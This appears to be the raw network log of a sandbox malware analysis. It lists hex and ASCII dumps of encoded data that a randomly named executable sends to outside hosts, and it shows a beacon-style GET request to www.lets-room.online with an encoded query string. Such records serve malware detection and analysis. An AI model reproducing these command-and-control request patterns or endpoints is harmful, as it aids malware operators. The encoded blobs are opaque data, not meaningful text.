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
                                                                                                                                                                                                Nov 17, 2023 19:29:24.206640005 CET609OUTData Raw: 36 37 72 64 4a 57 4d 32 44 6a 62 54 63 73 45 77 45 4a 39 4e 55 77 78 37 41 68 4c 2f 4f 30 33 6d 35 75 6e 37 54 50 51 76 48 57 45 4d 64 6d 53 38 38 46 69 78 66 34 69 36 4a 69 70 39 4a 4d 30 32 33 74 2b 51 37 65 4a 74 55 33 7a 78 38 6a 47 46 4f 35
                                                                                                                                                                                                Data Ascii: 67rdJWM2DjbTcsEwEJ9NUwx7AhL/O03m5un7TPQvHWEMdmS88Fixf4i6Jip9JM023t+Q7eJtU3zx8jGFO5CJvaIwaFwdfPahNu9S3gXRlqbn7rMg9gblrxb14xk6kqyesdiiQb5Xc1Qx2JRhMcGpKjnUFzbsWvzZDAqD+jjDAFBPrv8KE8U+sy915U3SydpZGHNFDR8R66n4YSzMHYVkuVms3JKHR0OC9tiafrTJ2U0VeWGMV4M
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207456112 CET611INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                                                                                                Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207732916 CET612INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:24 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                                                                                                Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207767010 CET615OUTData Raw: 6b 6c 77 65 63 66 6c 73 2b 78 4d 6f 42 36 66 76 35 79 77 77 7a 61 41 42 7a 51 54 64 74 47 4d 67 6b 44 70 79 4d 33 6a 4a 68 56 73 71 6e 49 4d 64 73 71 47 5a 2f 4d 6d 4f 66 48 36 51 39 34 62 42 49 67 70 46 4d 32 6f 6f 4e 36 46 48 64 44 33 74 6f 73
                                                                                                                                                                                                Data Ascii: klwecfls+xMoB6fv5ywwzaABzQTdtGMgkDpyM3jJhVsqnIMdsqGZ/MmOfH6Q94bBIgpFM2ooN6FHdD3tosmc5AlYec6LIJRVpv3JDEQdoRzEtNPGLTR15J7INenjQxA9k5el+e6F10+0tgl5wezq0lclJG/07v/MuTwSFf1lYkC+PoQ4KUPv1WiLm220D1JiDot60bxGQcVFxGqdoFSGpD3+Mp/L5nzkso2gThhczZbAJ3Z0qG1
                                                                                                                                                                                                Nov 17, 2023 19:29:24.207828045 CET616INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                                                                                                Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy
                                                                                                                                                                                                Nov 17, 2023 19:29:24.208199978 CET619OUTData Raw: 66 65 74 53 45 4c 45 63 51 5a 6a 49 53 42 4c 35 67 76 33 4f 45 48 76 63 68 37 54 66 49 67 52 4f 6a 65 56 32 78 6d 55 52 54 50 44 67 55 72 6a 68 38 56 4e 4b 45 4f 63 67 30 38 37 65 50 4b 61 62 48 69 75 65 48 46 6c 63 6f 49 32 63 45 6c 4d 72 72 4c
                                                                                                                                                                                                Data Ascii: fetSELEcQZjISBL5gv3OEHvch7TfIgROjeV2xmURTPDgUrjh8VNKEOcg087ePKabHiueHFlcoI2cElMrrLfGYmaIRIwEwXzk2TWA7WIm0H7qEfWluchUQOCQOIexzajo69Au54YIWQCp7soRUPbANH1AbcVUMQFarXoJmFXBJCStNguZ+wcP+KeY+INJ7B9zIH0tl4NaVqEabbFjiU33bXFNlGS2zh9WyE0qcd+B4lwK9XmQISg
                                                                                                                                                                                                Nov 17, 2023 19:29:24.428890944 CET621OUTData Raw: 64 35 42 67 6e 6f 30 38 76 44 7a 51 32 43 4f 52 65 74 75 34 5a 4f 4c 79 63 57 6d 62 46 2f 47 6b 70 4a 38 57 4a 79 75 75 78 65 4c 64 43 45 7a 76 65 6e 73 42 39 58 71 39 66 55 69 47 2b 32 42 79 37 68 48 48 61 4c 4d 30 75 69 31 6c 68 67 45 75 71 34
                                                                                                                                                                                                Data Ascii: d5Bgno08vDzQ2CORetu4ZOLycWmbF/GkpJ8WJyuuxeLdCEzvensB9Xq9fUiG+2By7hHHaLM0ui1lhgEuq4RvBxYtDQ8gVrXzGYffSOqGVw/Pl0Mgp63yIvogFxE4ji79BA5F/4HdskcysC2x9mLbRry2ZB/bRmlV5e0DyuTzI5wcRSVonHU5eG8Hi160LOtYoYgHW1YZgVzvOT6HdGQ40n3+TA8F/BLRM22tHy8mcE1RXlCnky4
                                                                                                                                                                                                Nov 17, 2023 19:29:24.428999901 CET625OUTData Raw: 2f 69 5a 6d 52 66 4d 70 51 55 43 6b 5a 30 63 55 4c 54 56 4d 6b 73 50 69 65 70 32 68 2b 45 79 41 43 67 32 77 73 43 42 6c 2f 4e 4c 66 74 68 59 48 54 50 75 6c 57 66 53 6a 37 65 6b 32 69 38 7a 55 47 36 4e 38 73 73 62 57 68 4b 4f 53 2f 35 50 76 47 49
                                                                                                                                                                                                Data Ascii: /iZmRfMpQUCkZ0cULTVMksPiep2h+EyACg2wsCBl/NLfthYHTPulWfSj7ek2i8zUG6N8ssbWhKOS/5PvGI5AoxzevE+Cojyy2GXCxendFVP6dZFXOI17hGA/p4yn2GYvVQHP52wX7rTNpRb6azYwsuyVKfcqG+9KJFfjvC8qW4L8UMuZRjk2IpWg1AkQFyxAYPqn9gzsSUV8ISFCSpzWvVYWwQEGuchPI4QlXEAuA2AxZPwfpoY
                                                                                                                                                                                                Nov 17, 2023 19:29:24.643881083 CET628OUTData Raw: 75 54 38 4c 7a 6e 52 37 45 56 41 6b 4d 57 2f 63 49 5a 73 68 65 55 50 70 7a 47 78 46 33 44 33 72 4a 49 31 65 67 69 74 42 78 44 63 4c 6a 61 62 38 76 79 50 4c 79 44 31 74 62 6c 49 30 72 71 54 30 66 44 47 72 77 42 4e 79 33 42 35 4e 4e 64 33 56 75 51
                                                                                                                                                                                                Data Ascii: uT8LznR7EVAkMW/cIZsheUPpzGxF3D3rJI1egitBxDcLjab8vyPLyD1tblI0rqT0fDGrwBNy3B5NNd3VuQtzpRK7XAvoOaGg2C5gddzNC0yqfeib3HRpkCYmWKYXASCB2Outm3BIu3z/cI+1zO4xa07rGQ1Ok6tmY1BGwL/b8bvXCqvhS61gQ6gEX+qBPhhY0LnnutTRNKmNGPt+72smN2a2a2moFyfJStGodpXly7GDESl5aMJ
                                                                                                                                                                                                Nov 17, 2023 19:29:24.644068003 CET630OUTData Raw: 70 54 5a 33 38 42 79 51 77 36 45 76 6f 4a 6c 74 66 79 66 6c 69 51 34 37 4d 4c 57 67 6e 44 64 4a 74 46 43 70 4b 75 70 2f 52 6b 5a 46 6c 53 5a 31 5a 4d 5a 39 45 41 66 55 4f 6a 77 39 6f 77 65 68 54 66 6c 37 64 72 35 59 5a 57 4b 62 76 31 36 34 44 4f
                                                                                                                                                                                                Data Ascii: pTZ38ByQw6EvoJltfyfliQ47MLWgnDdJtFCpKup/RkZFlSZ1ZMZ9EAfUOjw9owehTfl7dr5YZWKbv164DOqEj51kVqW+/p2ERYVwcilS1rK62Xmd55axnQ8R39U4DAwrq02AW+irPju4x8iSiQLtM/ptER+WiHRjWFk4UlryH7mNzl9H/Juu0VgCh4GIou1g7jtgKQDfRUxNlimb/Cs219lg06IbOFCBkknpn+jkwklFKo8KXDE
                                                                                                                                                                                                Nov 17, 2023 19:29:24.644179106 CET632OUTData Raw: 66 50 37 6f 4f 2f 46 6d 2b 35 52 53 62 46 64 64 31 4b 33 42 59 71 74 55 45 4c 38 74 6b 4b 46 53 58 70 48 59 76 72 4d 66 2b 47 47 4a 41 67 45 65 68 54 6e 32 6f 46 51 6e 47 32 37 76 52 56 30 61 4b 47 35 57 6d 69 73 4a 6f 2b 68 65 6a 75 58 51 65 65
                                                                                                                                                                                                Data Ascii: fP7oO/Fm+5RSbFdd1K3BYqtUEL8tkKFSXpHYvrMf+GGJAgEehTn2oFQnG27vRV0aKG5WmisJo+hejuXQeeVZeqUyqntJmuuEWhwFkpHCv7H6AVciKJX4YZyzbL+sU97+zFNpRDgpoV9NISGXzpxsmDJODsWfiMSAuLAV+RKy4GxNpvaK9RccbYHTFp97RWedtB8OZhdV78x0STCXtg7oslR94YSHsEtoAeXDO9nbIujdrevZO6U
                                                                                                                                                                                                Nov 17, 2023 19:29:24.860112906 CET634OUTData Raw: 7a 4c 79 46 45 6c 6a 67 6e 44 4f 73 4d 67 47 7a 6f 62 68 58 63 62 54 6a 6d 52 59 4e 50 4e 72 43 50 73 36 4c 33 61 51 6e 56 43 72 75 64 56 6f 43 65 6b 75 70 78 74 71 56 43 47 6f 4d 7a 6d 33 76 79 5a 64 44 4b 42 61 69 66 42 50 78 33 53 6c 59 62 45
                                                                                                                                                                                                Data Ascii: zLyFEljgnDOsMgGzobhXcbTjmRYNPNrCPs6L3aQnVCrudVoCekupxtqVCGoMzm3vyZdDKBaifBPx3SlYbEFdtxmezsAT2gsUjgMKVhDTtt3Cxkm3DNL8/EV6+GjbXI3u19mYCSH0vTIYaPp4lP/LInKvSZSd8RuFZ+j7G5EdzdOQT0WRBD6sHKSUQ79nFEyjHC3p+9xmBDJuDYmiY1sZ6kTovU7ZSVIV9TsUzIH+bqWdCOaOO9F
                                                                                                                                                                                                Nov 17, 2023 19:29:24.860188007 CET637OUTData Raw: 38 32 31 2f 65 48 51 74 54 70 33 4b 61 45 30 7a 70 36 32 46 31 55 69 6d 78 54 4a 4f 61 4e 30 52 53 75 41 50 34 52 58 6e 51 4a 34 56 38 33 38 63 49 68 52 6f 71 68 61 67 72 43 71 61 68 4a 38 45 37 76 37 62 6a 6e 37 7a 39 6c 42 47 4c 66 45 77 35 43
                                                                                                                                                                                                Data Ascii: 821/eHQtTp3KaE0zp62F1UimxTJOaN0RSuAP4RXnQJ4V838cIhRoqhagrCqahJ8E7v7bjn7z9lBGLfEw5CVHtWoS6Zxv5Zz/hn2v5/7oSjsDt4CAkq/ClFBPwKciH11cjGdWpAFP7OvmVHzHigdngEHGDmxB7I+XNUVuSYyIxOXaZc9SPcdVD9ts3aGAEcVvQrmsrEMMdzKDeKjN6Oq7XEnLVV1mcaWSDbQdrY4My8z8+eARHXy


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                26194.58.112.17480192.168.11.2050153C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:26.724462986 CET652OUTGET /fbkg/?T6I=1e2gHfHHru8C8drNoa5nQ+ppQcfOtPpy/tqqaGYFPoE7F/MNi+0XBdtoIJB4HFmIBuT2tqcIait1CoK9oXPorw0w8HqvZiCD5A==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.lets-room.online
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:29:26.938961983 CET654INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:26 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 32 39 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 74 73 2d 72 6f 6f 6d 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 20 d0 b2 26 6e 62 73 70 3b 3c 61 20 63 6c 61 73 73 3d 22 62 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 67 2e 72 75 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74
